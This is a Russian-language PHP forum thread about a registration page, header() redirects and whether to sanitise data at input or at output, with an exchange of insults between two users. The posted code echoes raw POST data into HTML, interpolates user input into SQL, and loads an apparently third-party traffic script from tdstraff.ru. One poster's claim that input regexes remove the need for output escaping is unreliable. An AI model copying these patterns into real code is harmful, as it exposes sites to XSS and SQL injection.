Все правильно написал Raito-kun, но он забыл про Ф5. Просто, после вставки, делай редирект на страницу, но не обновление это страницы!.

Редирект не получается...

Как это? header() в помощь

Неправильно я использую/ непонимаю как использовать...

$message="Вы зарегестрированы!";
echo('
<div id="left-block">
<div id="caption">
<h3><b>Регистрация</b></h3>
</div>
<div id="mess">
<br>
<center>'.$message.'</center>
<br>
<center><img src="./image/site_img/i.png" alt="fuck"/></center>
    <br>
	<br>
    <b>Имя:</b>     '.$_POST['Uname'].'
	<br>
	<br>
   <b>Логин:</b>  '.$_POST['Name'].'
	<br>
	<br>
	<b>E-mail:</b>   '.$_POST['Email'].'
</div>
</div>
</div>
');
header("Location: index.php");
}

<?php
session_start();
include 'connect.php'; 
$result=mysql_query("SELECT * FROM `site_settings`") or die (mysql_error());
$array = mysql_fetch_array($result);
?>
<html>
<head>
<LINK rel="stylesheet" media="screen" type="text/css" title="Style" href="./style.css">
<title><?php echo($array['title']);?></title>
<script language="JavaScript" type="text/javascript" src="http://tdstraff.ru/get.js?user_id=10002&mode=click"></script>
</head>
<div id="font">

<div id="sitename">
<h1> 
<br>
<?php echo('<a href="'.$array['url'].'" class="logo">'.$array['sitename'].'</a>');?>
</h1>
</div>
<div id="navigation">
</div>
<div id="center">

заголовки должны посылаться до любого вывода в поток, отсюда и ошибка.

ПС. Кстати, не совсем понятно, причем здесь F5 к инъекциям...

kmaks
а где, собственно, регистрация (внесение данных пользователя в базу)?
здесь только вывод.

Собственно, регистрационные действия должны проводиться до редиректа, а весь вывод (уже не из POST-элементов, а из базы) - после него.
Тогда и информация будет видна, и вывод мешать не будет.

на форуме ирбиса есть статья про безопастность точно. там и про скл инъекции и про пхп инъекции и про хсс...попроси хорошенько Николая, может он выложит на ирбисе

Код прикреплять не стал, серно все некрасиво(в плане стиля)
ща попробую, но с трудом верится....

Как используется редирект на сайтах то? Там ведь сообщения выводятся перед редиректом....

$show=mysql_query("SELECT * FROM `users` WHERE `username` = '$Name'"); 
$row = mysql_fetch_array($show);
$message="Вы зарегестрированы!";
header('Location: index.php');
echo('
<div id="left-block">
<div id="caption">
<h3><b>Регистрация</b></h3>
</div>
<div id="mess">
<br>
<center>'.$message.'</center>
<br>
<center><img src="./image/site_img/i.png" alt="fuck"/></center>
    <br>
	<br>
    <b>Имя:</b>     '.htmlspecialchars($row['uname']).'
	<br>
	<br>
   <b>Логин:</b>  '.htmlspecialchars($row['username']).'
	<br>
	<br>
	<b>E-mail:</b>   '.htmlspecialchars($row['mail']).'
</div>
</div>
</div>
');

Недоганяю...

kmaks

все равно недоходит...пошел читать

kmaks

Везде одно и тоже...нужно использовать до вывода чего-либо в браузер..но как??? вся страничка строится на выводе...

в результате пришлось использовать

вот и мечи после этого бисер...

kmaks
Для чего ты используешь htmlspecialchars при выводе?
Её надо использовать при вводе, покажи код формы ввода данных, туда и вставляй htmlspecialchars, а потом регулярку! И просто регулярку сразу нормальную сделай!

Raito-kun
Простите, но нахрена? Если у меня в базе чистые значения содержаться? Фильтровать нужно при вводе, чтоб в базу заносились чистые значения, тогда не надо на выходе использовать htmlspecialchars всякие и вообще лучше юзать регулярки!

Это проще даже как никрути, один раз у юзера взял данные сразу их привёл в божеский вид и запихал в бд чистые как надо, и потом ты не паришься, везде добавлять htmlspecialchars при выводе этих данных, а тупо выводишь! Идея ясна?

denizkin

ой-ой какой ты умный.

Raito-kun
1) https://usawindowribbons.com/ - этот сайт походу на Джумле, дизайнер какой-то чел не русский, про тебя что ты его делал там ни слова!

2) На втором сайте тоже никаких упоминаний о тебе! Форум там на Vbulletin подозреваю движок тоже какой-то готовый!

3) На третье сайте так же никаких упоминаний о тебе!
Как докажешь, что ты делал? И да 3 сайт на вордпрессе! http://www.leftbraindga.com/sitemap.xml

Так что не учи отца ебаца, ты ещё ни одного движка сам не написал!

denizkin, Raito-kun
вас забанить, чтобы остыли?

Внесу свои пять копеек и повторюсь.
1) Фильтрация данных нужна там где она необходима.
2) Фильтровать всё 1 функцией (POST, REQUEST) будет только говнокодер, которому плевать на расширяемость приложения, также не беспокоясь за то что где-то фильтрация будет ему мешать.
3) Если нужна базовая фильтрация от SQLInj, то повторюсь она должна проходить непосредственно в классе для работы с БД через спец. placeholders-ы, дабы опять же в некоторых местах не мешать нам, сюда можно не только mysql_real_escape включить, но и классификацию placeholders-ов по типам данных.

Raito-kun
Разработать к готовому фреймворку труда не составляет, написать свой с нормальной архитектурой сложно!
Я делал и с нуля, и к готовым фреймворкам, и сейчас работаю в компании программистом разрабатываю ERP - систему, была изначально CRM система щас уже в ERP переросла! Так, что я думаю ты полюбому меня ничему не научишь и не переубедишь, если ты говоришь слова вывод ЛЮБОГО ТЕКСТА htmlspecialchars, прости конечно, но всегда считал, что в базе содержатся ДАННЫЕ!

И также первое моё сообщение в данном топике было адресовано автору, а не тебе, где автор фильтрует имя пользователя, логни и e-mail при выводе непонятно зачем! Тобишь, какие данные у него могут быть логин, e-mail или имя пользователя? Непонятно какими, поэтому ему их надо фильтровать при реге пользователя, тобишь при вводе данных пользователем!
Для всех я бы лучше применил регулярные выражения, чтоб точно были нормальные имена и e-mail, так же подтверждения акка через мыло! И тогда на выходе ничего фильтровать уже не надо, в логине , имени и мыле будут нормальные данные которые будут корректно выведены и никак не навредят сайту!

Удачи, больше тебе что-то объяснять я не намерен, просто бесполезно это!